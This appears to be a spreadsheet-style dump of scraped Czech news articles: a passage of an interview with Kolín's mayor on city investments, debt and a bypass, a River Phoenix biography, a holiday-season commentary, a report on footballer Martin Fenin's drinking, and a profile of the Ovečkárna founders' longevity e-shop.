a také na Třídvorské. Chtěli bychom konečně zrekonstruovat Kmochův dům, na to máme v rozpočtu 40 milionů korun. Tam by měly vzniknout dvě dětské skupiny. Máme opravdu hezkou architektonickou studii a dělá se z ní projekt na nový pavilon v Základní škole Sendražice . A tam bychom chtěli v příštím roce také začít stavět. Hezká podle mě bude nová fasáda Praktické školy naproti Futuru. Ta už je v běhu. Těch investic je tam vážně opravdu hodně, celkem asi za 550 milionů. play_fill Kolínsko Mimo rozpočtu se na zastupitelstvu řešil i zákaz pití alkoholu na vybraných veřejných místech. Přiblížil byste, o které lokality se jedná a jak palčivý problém to ve městě je? Obecně se ta vyhláška týká autobusových zastávek, okolí sportovišť a okolí škol a školek, aby se tam nepil alkohol , což je naprosto v pořádku. A to už platí v Kolíně několik let. A teď vzhledem k tomu, že v poslední době jak od městské a státní policie, ale i od některých občanů a sdružení SVJ vlastníků, byly podněty u večerek, kde lidé stáli do noci s lahví něčeho, piva , vína a tak dále, popíjeli a nebyli úplně potichu. Takže přibyly nějaké další lokality jako u Kostelíčka, Jiráskovo náměstí, Tovární, U Jána, Bezovka, u Lenina a také Vodárna a další. Městská policie tedy na těchto místech může ty lidi vykazovat nebo jim ten alkohol i odebrat? Může jim ho i odebrat anebo může uložit pokutu. Protože pokud by ta vyhláška nebyla, městská policie s tím nemůže dělat nic. Takhle to může řešit. Za porušení obecně závazné vyhlášky. V roce 2025 v Kolíně zahájí provoz sdílená kola. Myslíte, že budou v konkurenci MHD zdarma dostatečně využita? Na sociálních sítích jsem také četl obavy, aby se bicykly takříkajíc neválely všude po městě. Tak uvidíme. My jsme o nich mluvili dlouhou dobu. Nechtěli jsme jít úplně do elektrických koloběžek, protože pak člověk vidí, jak se to všude různě v těch větších městech válí po ulici. Samozřejmě, že i kolo někdo může ukrást, někam hodit, to je pravda. Na druhou stranu, když si to člověk půjčuje, tak se musí zaregistrovat přes aplikaci a musí to vrátit na vyhrazené místo. Společnost Nextbike by se o to měla starat o všechno. A my jsme výběrové řízení hlavně vyhlásili tak, že nechceme jako město platit nějaký paušál společnosti, která to provozuje. Město opravdu bude platit jenom ty skutečné výpůjčky na těch prvních patnáct minut. Takže teď je to spíš trošku na tom, jestli si to lidé budou půjčovat, ale pokud se to osvědčí, tak předpokládám, že to zůstane nadále. Pokud neosvědčí, to je těžké predikovat, ale na druhou stranu si myslím, že by byla škoda to v takhle hezkém rovinatém městě, kde teď ještě doděláváme dost cyklostezek, nevyzkoušet. Takže uvidíme, jaký bude zájem. play_fill Kolínsko Takže teoreticky, kdyby se to opravdu neosvědčilo, tak se to dá zrušit? Samozřejmě. Ta smlouva má normálně výpovědní lhůtu. Dluh Kolína klesl o zhruba jednu miliardu a již se nachází pod sto miliony korun. Do dvou let tedy bude doplaceno? Pokud ano, jak moc to městu rozváže ruce v dalším investování? Vzhledem k tomu, jak se vyvíjí rozpočet a ekonomika města, tak si myslím, že budeme za dva roky schopní to splatit. A tím pádem budeme mít větší prostor pro vlastní investice. Pro srovnání někdy v roce 2010 byl rozpočet města asi 1,3 miliardy a z toho 120 milionů šlo na dluh. Dnes je roční rozpočet asi 1,7 miliardy a na dluh jde 50 milionů. Je o vás všeobecně známo, že jste duchem sportovec. Co ale říkáte na současný stav kolínských sportovních týmů? Hokejisté a fotbalisté se krčí na spodku svých soutěží, basketbalisté se rozpadli úplně. To vás asi příliš netěší, že? Jedna věc je, jak ty kluby fungují, což si myslím, že ten hokejový i fotbalový fungují dobře. Druhá věc pak jsou výsledky áčka, protože to je to, na co lidé koukají. Ale samozřejmě i u hokejistů a fotbalistů tam jsou spousty dětí. A mládežnické týmy hrají dobře. Takže doufejme, že se to zlepší. Myslím si, že Kolín má na to být neustále ve druhé nejvyšší hokejové lize. U fotbalu je ta třetí liga za mě rovněž optimální. Basket, to je asi samostatná kapitola. Tam je bohužel dohnala situace v klubu, která dlouhodobě nebyla finančně ideální a teď je dohnaly dluhy vůči České basketbalové federaci, která jim odebrala v létě licenci. Kolínsko U basketbalu bych se ještě zdržel. Je všeobecně známé, že klub nejen po Kolíně dluží nemalé částky. Řadí se do fronty dlužníků i město? Ano, řadí. Vzhledem k tomu, že město basketbal financovalo. Nicméně oni nebyli schopní vyúčtovat část dotace z letošního roku, tak ta pohledávka je asi 1,2 milionu korun na sro, což je tým dospělých, a na zapsaný spolek, což je mládež, asi 400 tisíc korun, které teď basketbalový klub dluží. Probíhají nějaké výzvy, zatím to uhrazeno nebylo, takže potom proběhnou další kroky, stejně jako u jiných věřitelů to bude případně předáno exekutorovi. Navázal bych další společensko-sportovní otázkou. Areál bývalého fotbalového klubu AFK Kolín je v majetku advokáta Martina Buřiče, který vlastní i BC Kolín . Jaký je momentální vývoj ohledně hřiště? A je nějaká naděje, že by jej město někdy získalo zpět? Proběhlo soudní řízení mezi městem a AFK, kdy soud řekl, že ty pozemky AFK patří. Nicméně potvrdil i to, že město tam má předkupní právo. Teď v poslední době jsme zjistili, že si na to vzali nějaké půjčky, zastavili ty pozemky do zástavy, v tuto chvíli tam jsou několika milionové zástavy a mám tu informaci, že teď tam něco v rámci tohoto prošetřuje Policie České republiky , ale víc nevím a ani víc to teď asi nemůžu komentovat. Každopádně se budeme snažit a stále se snažíme, aby to město získalo zpátky. Kolínsko Na závěr dvakrát hudba budoucnosti. Nedávno skončila soutěž o podobu nové knihovny na Jiráskově náměstí. Shrňme prosím stručně, co se ohledně této stavby bude v horizontu příštích let dít. Teď budeme chtít všechny ty návrhy představit a uspořádáme jejich výstavu. V příštím roce bychom měli udělat zadání dopracování studie, protože tohle je soutěžní návrh, ale pak se musí jít formou architektonické studie a z architektonické studie by se mělo jít formou projektu, který se dodělá a teprve z projektu by se mělo realizovat. Takže ten základ by měl být takový, jak vychází z architektonické soutěže. Ale jsou tam nějaké drobné možnosti změn a to by se mělo dopracovat v příštím roce. Nechci se úplně pouštět do nějakých vzdálených časových predikcí, protože to přesahuje stávající volební období. Může přijít jiné vedení a celé to shodit ze stolu. Také se bude muset získat dotace, protože to bude velmi nákladná záležitost. Ale myslím si, že dřív než za pět let nová knihovna stát určitě nebude. A teď zatím spíše sci-fi. V jakém stádiu je v tuto chvíli východní obchvat Kolína ze Šťáralky k Ovčárům ? Je nějaká vize, kdy by teoreticky mohl být hotový? Čeká jej spousta překážek jako Labe, kolejiště, Třídvorská… To určitě není scifi, děláme reálné kroky k realitě. Momentálně probíhá studie. Ta by měla být hotová někdy v polovině roku 2025. A ta studie už řekne tu variantu, kudy by to mělo přesně jít. Udělá návrh řešení, včetně toho, kde by to mělo být po zemi, kde by mělo být přemostění, kde by měl být naopak zářez, nějaké protihlukové valy a tak dále. Napojení na stávající komunikace typu Starokolínská, Třídvorská a další. Povede to od Šťáralky, přes vlakovou trať, Starolínskou, Labe, Třídvorskou, za Vinicí a směrem na velký kruhový objezd v průmyslové zóně. Součástí studie bude i biologický průzkum, jestli tam nejsou nějací chránění živočichové. A hlavně také náborový elaborát, to znamená prověření všech pozemků, které se v té dané budoucí trase nacházejí a jaké mají majitele. To by mělo být dokončeno někdy v polovině roku 2025, pak budeme řešit další kroky. Stavět by to měl kraj, ale financovat by se to mělo alespoň částečně ze Státního fondu dopravní infrastruktury. Protože by šlo o propojení silnice první třídy na jedné straně a druhé třídy na straně druhé, musí to vláda zařadit do tzv. strategických obchvatů. Po Novém mostě denně projede asi 1200 kamionů a 23 tisíc osobních aut, takže by si úlevu zasloužil. Stavebně je to samozřejmě horizont třeba deseti let, pokud to půjde všechno dobře, ale konečně už se na tom pracuje. Michael Kašpar 41 let, ženatý, dvě děti Původním povoláním středoškolský pedagog Od roku 2019 kolínský starosta, před tím od roku 2014 místostarosta Od roku 2022 náměstek hejtmanky pro oblast financí Autor: Petr Procházka Autor person Petr Procházka</t>
  </si>
  <si>
    <t>2340</t>
  </si>
  <si>
    <t>20250101_221_3695259029_65064a3a894a137c1b97.html</t>
  </si>
  <si>
    <t>65064a3a894a137c1b97</t>
  </si>
  <si>
    <t>Smutný osud uhrančivého Rivera Phoenixe: Patřil k největším talentům Hollywoodu, smrt si ho našla v pouhých 23 letech</t>
  </si>
  <si>
    <t>Shrnutí Smutný osud uhrančivého Rivera Phoenixe: Patřil k největším talentům Hollywoodu , smrt si ho našla v pouhých 23 letech River Phoenix vzal Hollywood útokem. Sice pocházel ze skromných poměrů, jeho talent ho ale dostal mezi velikány. Slibně rozjetou kariéru ale bohužel předčasně ukončila tragédie. Co se stalo? River Jude Phoenix se narodil 23. srpna 1970 v Oregonu . Jeho rodiče se ho rozhodli pojmenovat po Řece života z románu Hermanna Hesseho Siddhartha . Tato kniha byla populární mezi Američany zajímajícími se o buddhismus. Druhé jméno pocházelo ze slavné písně skupiny Beatles Hey Jude . Mohlo by Vás zajímat: Smutný osud Baby Peggy: Dětskou hvězdu němých filmu okradli o jmění vlastní rodiče Dětství v náboženské sektě Stejně jako spousta jiných mladých lidí i Phoenixovi rodiče podlehli v šedesátých letech vábení hippies. Seznámili se tak, že jeho otec John Lee Bottom svezl matku Arlyn (79) autem, když stopovala na dálnici . Po svatbě, která se konala v roce 1968, se rozhodli, že budou žít alternativně . Neustále se stěhovali, holdovali bylinným lékům a duchovnímu osvícení. V roce 1972, krátce po narození dcery Rain (52), se rozhodli vstoupit do sekty Děti Boží, v níž hledali spásu. Spolu s Rain a nejstarším synem Riverem odjeli coby misionáři do střední a jižní Ameriky . Zde se jim postupně narodily další dvě děti - Joaquin (50) a Liberty (48). River ale velmi trpěl. V pozdějším rozhovoru dokonce uvedl, že byl už ve čtyřech letech sexuálně zneužíván jinými dětmi. O pět let později naštěstí rodiče prozřeli a sektu opustili . Vrátili se do USA , kde se jim narodila dcera Summer (46), změnili si příjmení na Phoenixovi a Arlyn začala pracovat jako sekretářka v televizní stanici NBC. Sourozenci v čele s Riverem , který se od dětství učil hrát na kytaru, se zase vydali zpívat na ulici , kde je objevila jedna lovkyně talentů a hned jim nabídla smlouvu. Mohlo by Vás zajímat: Smutný osud Whitney Houston . V mládí ji zneužívala sestřenice, dvakrát potratila a bil ji manžel Slibně rozjetá kariéra Rivera Phoenixe River Phoenix disponoval třemi vlastnostmi, které mu zajistily slušnou kariéru již v deseti letech - šarmem, talentem a charismatem . Nejprve účinkoval v reklamách, pak přišla smlouva s Paramount Pictures a dětský pořad Real Kids . Herecké kariéře se začal naplno věnovat v roce 1980, kdy chodil na konkurzy do televizních pořadů. Měl štěstí - vyčníval nad ostatními . O čtyři roky později se objevil v epizodě The Riddle of Dyslexia seriálu ABC Afterschool Special , kde ztvárnil sice malou, ale zato věrohodně podanou roli, neboť sám bojoval s touto poruchou. A to ho katapultovalo mezi skutečné hvězdy . Nabídky se začaly objevovat jako houby po dešti. Dostal také možnost zahrát si ve filmu Stůj při mně , založeném na příběhu spisovatele Stephena Kinga (77). Bylo mu sice teprve šestnáct let, ale pozitivní ohlasy dostával jako starý mazák. V následném filmu s Harrisonem Fordem (82) a Helen Mirren (79) Pobřeží moskytů opět podal neuvěřitelný výkon, a navíc se zamiloval do herečky Marthy Plimpton (54) , se kterou prožil poměrně dlouhý vztah. Mohlo by Vás zajímat: Smutný osud humřího kluka Gradyho Stilese: Alkohol z něj udělal děsivou osobu, byl horší než sám ďábel River Phoenix začal experimentovat drogami Žít s Riverem přitom nebylo vždy jednoduché. Byl hodně přecitlivělý . Jednou třeba navštívili luxusní newyorskou restauraci, kde si Martha dala kraba. Phoenix v tu ránu vstal a odešel. Našla ho o pár ulic dál, jak sedí na lavičce a pláče . Byl totiž aktivistou za práva zvířat a veganem. Po dosažení dospělosti měl mladý herec na kontě impozantní sumu peněz . Rozhodl se tak, že nastal čas, aby jeho rodina skoncovala s kočovným životem. Koupil dva ranče - jeden na Floridě , druhý v Kostarice . V roce 1991 ho čekal další úspěch, a to ve filmu Mé soukromé Idaho , kde po boku Keanu Reevese (60) ztvárnil homosexuálního podvodníka . V době natáčení začal experimentovat se zakázanými látkami . Kvůli tomu také přišel o svou lásku. Martha ho prosila, ať s tím přestane, dokud je čas. On se ale nechtěl změnit. Zatím... Své problémy držel pod pokličkou, chtěl si udržet image kluka z plakátu. Pak ale přišla ona osudná noc , která vše změnila. Mohlo by Vás zajímat: Osudové okamžiky padesátníka Joaquina Phoenixe : Bratr mu umřel v náručí, kvůli traumatu z dětství vede své psy k veganství Tragická smrt Rivera Phoenixe Na konci října se Phoenix vydal se svým kamarádem, kytaristou Red Hot Chilli Peppers Johnem Frusciantem (54) , na několikadenní flám, kde konzumovali různé drogy a zcela vynechali spánek . River se totiž rozhodl, že si dá od herectví pauzu a vrátí se k tomu, co měl rád nejvíce, tedy hudbě. S Frusciantem tak měl 30. října vystoupit v klubu Viper Room . Ještě s dalšími spoluhráči pak plánovali odehrát koncert na Halloween. Během vystoupení se mu ale udělalo špatně , na což upozornil svého přítele a hudebníka Boba Forresta (63). Myslel si, že se předávkoval . Forrestovi to připadalo nepravděpodobné, vždyť normálně mluvil i stál. Přesto se nabídl, že ho odveze domů. River to ale v tu chvíli odmítl. O něco později se měl Phoenix dostat do sporu s ochrankou klubu. Ta ho pak vyhodila ven, kde se zhroutil na chodník . Všemu přihlížela herečka Samantha Mathis (54), jež byla v té době jeho partnerkou. River se začal svíjet v křečích. Po chvíli se zdálo, že přestal dýchat. V klubu byla i jeho sestra Rain, která mu začala dávat dýchání z úst do úst . Bratr Joaquin zatím volal 911. Když na místo dorazili záchranáři, zjistili, že má zástavu srdce. Po převozu do nemocnice se ho opakovaně pokusili resuscitovat. Marně. Zemřel v pouhých třiadvaceti letech. Z klubu se poté stala provizorní svatyně na jeho památku. Po pitvě vyšlo najevo, že měl v těle spoustu zakázaných látek , na čemž si smlsly noviny. Byl pravým opakem toho, jak se na veřejnosti prezentoval. Jeho přátelé a kolegové z branže se ho ale zastali. Prý drogy užíval jen sporadicky. Na onom tahu mu prý někdo podal nebezpečný koktejl látek , který způsobil jeho smrt. Oním člověkem měl být právě kytarista Red Hot Chilli Peppers . Je to ale pravda, nebo jde jen o zoufalé hledání obětního beránka? Zdroje informací: Wikipedia.org: River Phoenix Factinate.com: Stormy Facts About River Phoenix, Hollywood's Lost Heartthrob Jak jíst v padesáti, abyste si jídlo užívaly a nepřibíraly: Rady oblíbených gurmánek Dity a Karolíny Autor: Kamil Šivák Autor Kamil Šivák</t>
  </si>
  <si>
    <t>20250101_222_3695260715_c2f9e23f32862fce39ba.html</t>
  </si>
  <si>
    <t>c2f9e23f32862fce39ba</t>
  </si>
  <si>
    <t>Celonárodní dovolená se chýlí ke konci. K čemu ale byly nekonečné svátky vlastně dobré?</t>
  </si>
  <si>
    <t>Celonárodní dovolená se chýlí ke konci. K čemu ale byly nekonečné svátky vlastně dobré? KOMENTÁŘ MICHALA BORSKÉHO I Vánoční svátky a čas novoročních oslav se trefily do mimořádně výhodné termínové konstelace, která ve výsledku znamená, že víc jak dva týdny nikdo nic nedělá. Pro národ plný vystresovaných existencí to byla a je vzácná příležitost se trochu zamyslet a uspořádat si vidění světa a sebe v něm. Využili jsme ji však, nebo si jen protáhli čas bezuzdné zahálky, žraní a návštěv příbuzných, které jsme stejně nechtěli vidět? Ruku na srdce, jen opravdu hodně málo Čechů udělalo a udělá v práci mezi 21. prosincem a 5. lednem něco víc, než že zkoukne rádoby vtipná a srdečná gratulační „péefka“ a zarezervuje zimní dovolenou. Kromě lidí pracujících v oborech, které zabezpečují nezbytný denní chod života nebo rozhodují o životě a smrti, ti ostatní nepracují a ani pracovat nemohou, protože nemají s kým. I na dveřích zhusta navštěvovaných provozoven často najdete jen strohou informaci ve smyslu „Budeme se na vás těšit zase v novém roce.“ Prostě reálný stav nikým nevyhlášené, ale skoro všemi svorně sdílené celonárodní dovolené. V součtu s letními prázdninami, kdy se toho taky moc neudělá, a zhruba dalším měsícem nicnedělání o jiných svátcích a prázdninách je to obstojný luxus. Soudě podle této bezprecedentní velkorysosti nakládání s časem by si jeden řekl, že naše ekonomika musí patřit mezi nejvyspělejší na světě a prostě si to může dovolit. Není tomu tak, ale to je námět na jiný článek. Co si však počít s takovým množstvím volného času? Vezměme to pěkně chronologicky. Velkolepé entrée celonárodní dovolené samozřejmě představují Vánoce. Závody v povinném nakupování dárků kulminují těsně před Štědrým večerem vyzvedáváním posledních balíků z přetékajících boxů zásilkových služeb, které dnes už przní skoro každou českou náves. Vánoce si idealizujeme a tváříme se, že jsou časem, kdy naše všední problémy neexistují, prostě nejšťastnější čas v roce. Blbost uvrhávající většinu lidí, kteří zrovna nežijí na obláčku vystavovaném na „instáči“, do ještě větší deprese než normálně. Žádné statistiky neexistují, ale spíše než usmívajícími se ideálními rodinami z televizních reklam je česká kotlina vyplněna individui řešícími kumulující se konflikty s příbuznými, nemoci blízkých v terminálním stádiu a nedostatek peněz na účtu. Lidé v rodinách sami na sebe vyvíjí tlak tím, co všechno je potřeba o svátcích stihnout, koho je nezbytné navštívit a kdo bude nejvíc uražen, když se k němu přijede s dary až po tom druhém. Po absolvování těchto nechutných oficialit plných nuceného udržování dekora, veselí a zdání soudržnosti se člověk obvykle zcela zdecimován odvalí do soukromí, kde se mu z toho všeho udělá ještě víc špatně. Skutečný význam mají Vánoce a potažmo celé svátky na konci roku pouze pro dvě skupiny lidí: praktikující křesťany a děti včetně těch, kteří už v Ježíška nevěří, ale tváření se, že existuje, považují za snesitelnou oběť vyváženou hromadou darů, o které si „Ježíškovi“ napsali. Mimochodem, pocit povinnosti někoho na povel obdarovat v posledních letech vytváří bizarní situaci, kdy si lidé posílají linky na zboží, které by se jim opravdu hodilo. Odporné. Volno obklopující Vánoce a Nový rok je ve většině domácností všechno jiné než pohoda. Hospodyňky jsou drceny očekáváními, že dokonale vycídí celý dům, připraví 37 druhů cukroví a seženou a reprezentativně zabalí dárky pro děti a všechny příbuzné. Muži, že rodinné hnízdo obalí největším počtem žároviček v ulici a na Silvestra zajistí detonaci největšího a nejbombastičtějšího množství rachejtlí. A hlavně musí být všichni na povel veselí, zábavní, šťastní. Díky návštěvám příbuzných a známých je samozřejmě spousta času na vědomé i podvědomé srovnávání se, které snadno ústí v rozvoj komplexů méněcennosti a jeho rodné sestry závisti. K tomu samozřejmě notně přispívají sociální sítě, kam lidé vyvěšují dokonalé fotky z Vánoc, chlubí se tím, co dostali nebo kam jedou oslavit Nový rok. Za dotaz „co děláte na Silvestra?“ by se každopádně mělo popravovat. Hlavní postava dělníka ( Jan Kačer ) z filmu Evalda Schorma s názvem Každý den odvahu říká: „To by snad nebyla neděle, abychom se nepřežrali.“ Totéž lze aplikovat na svátky na konci roku, z nichž se stal skutečný festival obžerství. Sotva dozní žlučníkové záchvaty z tun bramborového salátu naředěného metráky cukroví a podlitého litry Becherovky na uklidněnou, už je zde Silvestr s nechutnými hromadami vek, chipsů a majonézy. To poslední, na co máte čas i náladu, je cvičení nebo vyvážená zdravá strava. Následovat musí měsíc gastroenterální rekonvalescence, nebo nejlépe si u praktického lékaře rovnou zažádat o šest neděl placené ulejvárny v některých dotovaných státních lázních. Věřte nebo ne, znám opravdu lidi, kteří si tento čas, který je pro ostatní pokrytce totálním šílenstvím, dokáží upřímně užít. Typicky jde o páry, které se seznámily ještě na škole, záhy založily rodinu a mráček na jejich nebe nikdy nepřifoukla ani taková lapálie jako sex jednoho z nich s kolegou na záchodě během vánočního večírku. Stejně mám ale pocit, že nezbytný nadhled a schopnost dělat si v inkriminovaném volnu legraci, aniž by vás bolela hlava a břicho, je nutné podporovat nemalým množstvím alkoholu a drog, případně mimořádně optimistickou genetickou výbavou. Ti pragmatičtí, kteří si to mohou dovolit, to čím dál častěji řeší tak, že na celé svátky „vezmou roha“ kamsi do teplých krajin a starosti nechají jednoduše doma. Není to výrazem radosti a přirozenosti, ale spíš zoufalosti nad tím, že nevíte, co si s „nejkrásnějšími svátky v roce“ počít. Nemusím snad dodávat, že v očích příbuzných, kteří zůstali doma, bude 14denní zájezd na Srí Lanku dalším zdrojem jedovaté závisti a důvodem kopání příkopů. Třeba můj dvaasedmdesátiletý otec nelásku ke svátkům zase řeší tak, že si na Štědrý den a na Silvestra programově bere noční službu. Každý článek či komentář by správně měl směřovat k jakési katarzní pointě, pokud možno ještě přiměřeně vtipné nebo aspoň ironické. I já jsem doufal, že se mi v průběhu tvorby těchto řádek nějaké řešení vyjeví a nebudu na laskavého čtenáře jen vylévat vroucí žluč. Leč přiznávám, minimálně posledních pětadvacet let jsem ve výzkumu otázky „užívání si vánočního a novoročního volna“ nepokročil ani o píď – a to se i občas snažím. Povinné úsměvy mi prostě nejdou. Na jednu stranu bych hrozně chtěl někam pryč, na druhou stranu mi takové řešení přijde moc banální a ve své podstatě nesmyslné. Tak jdu do přírody, sám se vleču ojíněnou krajinou se soudruhem psem, ideálně když člověka ještě nepřidušuje inverzní krunýř. A tak se prostě těším do práce a na dobu, kdy zase věci dostanou přirozený pohyb a křeč pomine, nebo se transformuje v něco víc logického. Mějte se hezky a zachovejte INFO.CZ přízeň i roce 2025! 🔥🗞️ Přidejte si INFO.CZ do svých oblíbených zdrojů na Google Zprávy . Díky. Autor: Michal Borský Autor person Michal Borský</t>
  </si>
  <si>
    <t>20250101_223_3695266841_c4b0f3eb8d1b08a11708.html</t>
  </si>
  <si>
    <t>c4b0f3eb8d1b08a11708</t>
  </si>
  <si>
    <t>Martin Fenin brousí dno: Alkohol? Mezi lidi chodím opilý schválně, říká</t>
  </si>
  <si>
    <t>Martin Fenin brousí dno: Alkohol ? Mezi lidi chodím opilý schválně, říká Českému fotbalistovi Martinu Feninovi se idylický výlet změnil v peklo Martin Fenin brousí dno. Zdroj: ČTK / Profimedia.cz Martin Fenin má problémy s alkoholem . Zdroj: ČTK / Profimedia.cz Martin Fenin vyměnil rodinu za alkohol . Zdroj: Herminapress Martin Fenin přišel o manželku. Zdroj: Herminapress Bývalý fotbalista Martin Fenin . Zdroj: Profimedia.cz Bývalý fotbalista Martin Fenin . Zdroj: Ondřej Bičiště / MAFRA / Profimedia. Martin Fenin v dresu Slavie . Zdroj: Ondřej Bičiště / MAFRA / Profimedia. Kariéra Martina Fenina byla prošpikována průšvihy. Zdroj: Profimedia.cz Martin Fenin přišel o manželku. Zdroj: Profimedia.cz Kariéra Martina Fenina byla prošpikována průšvihy. Zdroj: Profimedia.cz Martin Fenin brousí dno. Zdroj: ČTK / Profimedia.cz Martin Fenin má problémy s alkoholem . Zdroj: ČTK / Profimedia.cz Martin Fenin vyměnil rodinu za alkohol . Zdroj: Herminapress Martin Fenin přišel o manželku. Zdroj: Herminapress Bývalý fotbalista Martin Fenin . Zdroj: Profimedia.cz Bývalý fotbalista Martin Fenin . Zdroj: Ondřej Bičiště / MAFRA / Profimedia. Martin Fenin v dresu Slavie . Zdroj: Ondřej Bičiště / MAFRA / Profimedia. Kariéra Martina Fenina byla prošpikována průšvihy. Zdroj: Profimedia.cz Martin Fenin přišel o manželku. Zdroj: Profimedia.cz Kariéra Martina Fenina byla prošpikována průšvihy. Zdroj: Profimedia.cz Neběhá na světě mnoho fotbalistů, kteří mohou říct, že dali gól ve finále MS. Martin Fenin to v roce 2007 dokázal. To je ale historie, ze které Fenin žít nemůže. Dnes je na dně. Dal gól Argentině ve finále světového šampionátu. Takový gól se počítá, i když to byl jen turnaj hráčů do dvaceti let. O rok později Martin Fenin ve velkém stylu vlétl do německé Bundesligy. Hned v prvním zápase v prestižní soutěži vstřelil Fenin tři góly a ve Frankfurtu ho milovali. To ale ještě fanoušci netušili, že českou hvězdičku bude limitovat hlava... Karel Poborský o štaci v Manchesteru United: Je problém, když prší a jídlo vám zabalí do novin Právě slabá mentalita a alkohol jsou kombinace, které z Fenina dělají trosku. Naposledy na sebe upozornil, když totálně opilý dorazil na rozhovor s Tomášem Řepkou . „Dobře jsem věděl, jak na tom jsem, když jsem šel do podcastu k Řepkovi . Bylo mi jasné, že se o tom bude hned psát. Stejně tak jsem věděl, že ve Zlatém stromu budou novináři a to samé na galavečeru Clashe. Nejsem blbej,“ uvedl Fenin pro expres.cz s tím, že pod obraz chodí mezi lidi úmyslně. Fenin je nyní sám, jeho manželka se s ním rozešla. Dramatickému rozchodu předcházely šílené věci, web isport.cz napsal, že po Feninovi zůstaly v domě fekálie a zvratky. Příběh fotbalového alkoholika Martina Fenina : Nemůže vídat dceru. To je dobře Fenin by rád znovu vídal dceru, ale je otázkou, zda pro malé dítě je dobré, když vidí otce v děsivém stavu. Snad se Martin nějak polepší, dcera by si to zasloužila... „Ano, chlastám . Každý den. Denně od té doby, co jsem vylezl z léčebny. Teď jenom koukám celý den na Youtube a piju Jägermeistera, abych zahnal stesk. Dřív nebo později se uchlastám k smrti,“ sdělil Fenin německému Bildu na konci roku 2024. S příchodem roku 2025 znovu vykládá o tom, že se určitě změní. „Byli jsme spolu v teplickém akvaparku a dceru budu mít i na Silvestra. Budeme u mých rodičů,“ svěřil se Fenin webu expres.cz s tím, že věří, že bude zase dobrým otcem... Na titulní straně lednového čísla je okouzlující Denisa Gudelj: Sdílejte článek Štítky Tomáš Řepka Argentina YouTube Frankfurt nad Mohanem fotbal sport Martin Fenin Bild silvestr Německá fotbalová Bundesliga sportovní disciplína Vybrali jsme pro vás Autor: FTV Prima</t>
  </si>
  <si>
    <t>20250101_224_3701239912_cb7f86f03ebf845e80f0.html</t>
  </si>
  <si>
    <t>cb7f86f03ebf845e80f0</t>
  </si>
  <si>
    <t>Najít druhý domov. Strůjci Ovečkárny o dlouhém životě i penězích, co je (ne)změnily</t>
  </si>
  <si>
    <t>Najít druhý domov. Strůjci Ovečkárny o dlouhém životě i penězích, co je (ne)změnily Společně vybudovali a posléze prodali huňatý e-shop Ovečkárna. Teď Lucie a Martin Bernátkovi chtějí Čechy přivést k dlouhověkosti a kolem toho postavit další úspěšný byznys. Sněží. Jak předvídatelné, přesto překvapivé. Vítr první vločky sezony vlezle rozfoukává do obličeje a teplota se stěží drží na plusových hodnotách. Nic příjemného. Počasí první prosincový pátek odhaluje zapomenutou sílu zimy a tím vytváří úšklebky i na tváři Martina Bernátka . „Člověk si rychle odvykne,“ zakření se, zatímco prochází centrem rodného Zlína . Místy, na nichž zhruba před dekádou postával od rána do večera, aby v často ještě horších podmínkách prodal co nejvíce svých produktů. „Vstávali jsme ve tři ráno, ve čtyři už jsme chytali místo, abychom byli co nejvíce na očích, a posléze celý den stepovali v kalužích a mrzli.“ Tentokrát nemusí. Vedle vědomí, že se za pár minut ukryje ve vyhřáté kanceláři, mu k pocitu spokojenosti přispívá i čepice pokrývající jeho hlavu. Je vlněná, dobře udržuje tělesné teplo a svého času ji prodávala Ovečkárna. Internetový obchod, který Bernátek na zelené louce (nebo spíše bílým sněhem pokrytých chodnících) vybudoval se ženou Lucií a téměř před dvěma lety prodal za stovky milionů korun skupině Enterstore , spadající pod holding Hartenberg, investiční větev expremiéra a miliardáře Andreje Babiše . Teď se manželé společně pouštějí do dalšího byznysového dobrodružství. Koncem loňského roku spustili nový e-commerce projekt, tentokrát zaměřený na longevity, skrze nějž chtějí Čechy přesvědčit, že cesta k dlouhému životu nemusí být tak složitá. Chceme vytvořit bezpečné místo pro běžného Čecha, který kvůli práci a péči o rodinu někdy zapomíná pečovat o sebe. Lucie Bernátková Přestože věk dožití občanů naší země poslední roky roste, jeho kvalitní část, tedy ta strávená ve zdraví, se naopak zkracuje. „Myslíme si, že život ve zdraví a z něj vyplývající dlouhověkost by měly být dosažitelné pro každého z nás,“ říká třiatřicetiletý podnikatel. Žít v duchu longevity, celosvětového fenoménu posledních let, který postupně proniká i k nám, totiž nemusí znamenat vyhýbání se slunečnímu záření, podstupování krevních infuzí od mladších jedinců a roční výdaje v řádech milionů korun. „Naším zákazníkem není nutně člověk s chytrými hodinkami, který má dietu na míru. Chceme vytvořit bezpečné místo pro běžného Čecha, který kvůli práci a péči o rodinu někdy zapomíná pečovat o sebe, a tak ho občas dožene stres a špatná strava nebo mu často chybí kvalitní spánek,“ doplňuje manžela o tři roky mladší Lucie. Bernátkovi, již se od počátku soustřeďují na řešení čtyř hlavních problémů, jimiž jsou zažívání, imunita, nespavost a nedostatek energie, proto sázejí hlavně na cenovou dostupnost a srozumitelnost, ať už informací na webu, či na etiketách svých produktů. Neboť, jak si uvědomují, jednou z bariér pro pořízení doplňků stravy je nízké povědomí o tom, co ve skutečnosti představují a jak se užívají. Nestavějí přitom pouze e-shop s vitaminy, suplementy a odbornými knihami, který by se postupně měl rozšířit i o ortopedické pomůcky nebo produkty pro alergiky, nýbrž dlouhodobý komunitní projekt. „Produktem to možná začíná, ale naším cílem je prodat lidem změnu, šanci na lepší budoucnost, aby docílili toho, že poté, co si u nás něco koupili, změnili svůj životní styl,“ přeje si Martin . „Výživové doplňky vás nespasí, je to jen část cesty k dlouhověkosti. Když se člověk nechce hýbat a kvalitně jíst i spát, je zbytečné, aby bral hořčík. Jakákoli drobná aktivita ale může člověku výrazně pomoct změnit život,“ doplňuje Lucie. Pokud se jim skutečně podaří o tomhle Čechy přesvědčit, mohou dosáhnout výraznějšího úspěchu než s Ovečkárnou. Potenciál je obrovský. Nasvědčuje tomu i skutečnost, že už před spuštěním projektu, prezentujícího se až nakažlivě pozitivní imagí, byl jejich nápad ohodnocen na pět milionů eur. A zájem investorů – velmi dobře známých ze stránek tohoto časopisu – přitahuje čím dál více. Přestože cestou externího kapitálu už se manželé pravděpodobně nevydají. K tomu, aby čtenář pochopil proč, je třeba podívat se o pár let zpátky. Nicméně není radno předbíhat. Vlněné papuče, deky nebo ponožky. Ale také česnek, vzduchovky, opékače na špekáčky. Bernátkův otec prodával smíšené zboží od přelomu tisíciletí, a tak bylo přirozené, že mu náctiletý syn chodíval vypomáhat. Vedle toho Martin , aby se po škole uživil, brigádničil, kde se dalo. Foto Tomáš Škoda Rozvážel pivo , pizzu nebo 